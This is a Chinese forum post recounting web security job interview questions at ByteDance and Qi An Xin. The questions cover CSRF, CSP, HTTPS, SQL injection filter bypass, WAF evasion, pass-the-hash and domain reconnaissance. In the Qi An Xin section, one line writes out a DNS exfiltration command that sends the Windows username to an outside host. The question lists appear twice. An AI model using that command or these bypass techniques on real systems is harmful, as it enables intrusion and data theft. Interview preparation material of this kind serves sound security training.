web安全面经 - 字节跳动、奇安信
拿到了字节跳动-互娱研发前端安全部门的校招offer,有位同学让发一下面经
之前记录下来的,不是记得很全,大家参考一下就好😅
(话说目前部门还在招人,有同学要来吗)
—— 字节跳动 ——
**浏览器安全机制(重点,问了很多个)
如何强制浏览器使用https协议 htsl?
之前爆出的github返回证书已过期事件 原因
react native框架中xss
进程、线程区别;浏览器多进程 一个tab一个进程,js渲染-线程
透明证书?
csp中nonce只加载部分内联脚本;解决旧网站的不兼容,上报log日志
promise、settimeout异步调用顺序
JS的异步回调机制
https一定安全吗?有没有办法抓包 -> cdn劫持
如何评估网站安全
如何设计网站加密系统用于加密代码中的敏感信息
返回证书错误的原因(证书已过期、证书中域名与服务器不对应、证书不是权威机构发布的)
csrf如果是post请求如何攻击(隐藏form表单) chrome8.1之后csrf的防御,之前的攻击方法无法携带cookie
csrf防御的token如何设置
x-frame-option
浏览器cookie相关
如何强制浏览器使用https协议 htsl?
之前爆出的github返回证书已过期事件 原因
react native框架中xss
进程、线程区别;浏览器多进程 一个tab一个进程,js渲染-线程
透明证书?
csp中nonce只加载部分内联脚本;解决旧网站的不兼容,上报log日志
promise、settimeout异步调用顺序
JS的异步回调机制
https一定安全吗?有没有办法抓包 -> cdn劫持
如何评估网站安全
如何设计网站加密系统用于加密代码中的敏感信息
返回证书错误的原因(证书已过期、证书中域名与服务器不对应、证书不是权威机构发布的)
csrf如果是post请求如何攻击(隐藏form表单) chrome8.1之后csrf的防御,之前的攻击方法无法携带cookie
csrf防御的token如何设置
x-frame-option
浏览器cookie相关
考了一道算法题,让用JS写😅但是我说JS不是很熟悉,用了c写
—— 奇安信 ——
1. 命令执行如果遇到windows怎么办(比如dns查询域名可以命令执行
ping %USERNAME%.xxx.ceye.io
2. limit 后怎么注入
3. 过滤了select怎么注入
if盲注 但是只能注入当前表
如果可以堆叠注入的话,可以赋值变量为16进制
4. 不知道列名怎么爆字段;查询information_schema表,这个表无权访问怎么办
5. 怎么绕waf
waf - 规则过滤、在沙箱执行语句后过滤返回结果(如果是报错就不返回)、rasp
6. java反序列化漏洞
7. windows PTH、怎么获得域控信息
8. php disablefunction原理
9. sql手工注入判断不同数据库
10. kerbose协议
11. sql注入 识别不同类型数据库
12. https加密 tls1.2 dhcp加密 可以解密吗
13. linux命令执行 空格过滤绕过
14. python变量类型
15. nmap太慢了怎么办
ping %USERNAME%.xxx.ceye.io
2. limit 后怎么注入
3. 过滤了select怎么注入
if盲注 但是只能注入当前表
如果可以堆叠注入的话,可以赋值变量为16进制
4. 不知道列名怎么爆字段;查询information_schema表,这个表无权访问怎么办
5. 怎么绕waf
waf - 规则过滤、在沙箱执行语句后过滤返回结果(如果是报错就不返回)、rasp
6. java反序列化漏洞
7. windows PTH、怎么获得域控信息
8. php disablefunction原理
9. sql手工注入判断不同数据库
10. kerbose协议
11. sql注入 识别不同类型数据库
12. https加密 tls1.2 dhcp加密 可以解密吗
13. linux命令执行 空格过滤绕过
14. python变量类型
15. nmap太慢了怎么办
祝各位同学都成功上岸!!
(发的好像有点晚了骚瑞
#面经##网络安全##校招##奇安信#(发的好像有点晚了骚瑞
好强 看不懂
tql
查看25道真题和解析
